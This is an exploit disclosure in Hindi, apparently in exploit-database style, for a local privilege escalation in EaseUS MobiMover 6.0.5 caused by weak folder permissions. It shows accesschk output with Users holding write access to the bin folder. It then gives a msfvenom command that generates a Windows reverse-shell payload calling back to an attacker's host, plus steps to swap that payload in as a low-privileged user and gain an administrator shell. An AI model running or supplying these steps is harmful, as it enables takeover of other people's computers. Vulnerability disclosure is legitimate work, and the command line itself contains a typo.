
EaseUS MobiMover 6.0.5 Build 21620 - असुरक्षित फ़ाइल और फ़ोल्डर अनुमतियाँ
MobiMoverUILaunch.exe विशेषाधिकार वृद्धि (elevation of privileges) भेद्यता से ग्रस्त है, जिसका उपयोग कोई "Authenticated User" सेवा की निष्पादन योग्य फ़ाइल को bin फ़ोल्डर के अंतर्गत अपनी पसंद के बाइनरी से संशोधित करने के लिए कर सकता है। यह भेद्यता "Authenticated Users Group" को दिए गए कमजोर अनुमतियों के सेट के कारण मौजूद है, जो (M) फ्लैग (अर्थात "Modify Privilege") प्रदान करता है।

विक्रेता का होमपेज: https://www.easeus.com/
सॉफ़्टवेयर लिंक: https://down.easeus.com/product/mobimover_trial_setup
Google Drive: https://drive.google.com/file/d/1tqP00IV-WzqNpyE1Rnqwdg_44RxOhINQ/view?usp=sharing
POC वीडियो: https://www.youtube.com/watch?v=FR4cQm-z4Gw
#PoC
C:\Users\creatigon>accesschk -uwvqd "C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin"
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin
Medium Mandatory Level (Default) [No-Write-Up]
RW BUILTIN\Users
FILE_ALL_ACCESS
RW NT SERVICE\TrustedInstaller
FILE_ALL_ACCESS
RW NT AUTHORITY\SYSTEM
FILE_ALL_ACCESS
RW BUILTIN\Administrators
FILE_ALL_ACCESS
Kali Linux पर msfvenom के साथ दुर्भावनापूर्ण बाइनरी फ़ाइल बनाएं
msfvenom -f exe -p windows/x64/shell_revese_tcp LHOST=<IP> LPORT=<PORT> -f exe -o prepare.exe
निर्मित 'prepare.exe' को Kali से Windows होस्ट पर निम्न-स्तरीय उपयोगकर्ता पहुँच के रूप में स्थानांतरित करें
निर्मित 'prepare.exe' बाइनरी फ़ाइल को 'C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin\prepare.exe' पर ले जाकर पुरानी फ़ाइल को निम्न-स्तरीय उपयोगकर्ता पहुँच के रूप में बदलें
जब प्रशासक एप्लिकेशन चलाता है, तो आपको प्रशासक के रूप में रिवर्स शेल प्राप्त होगा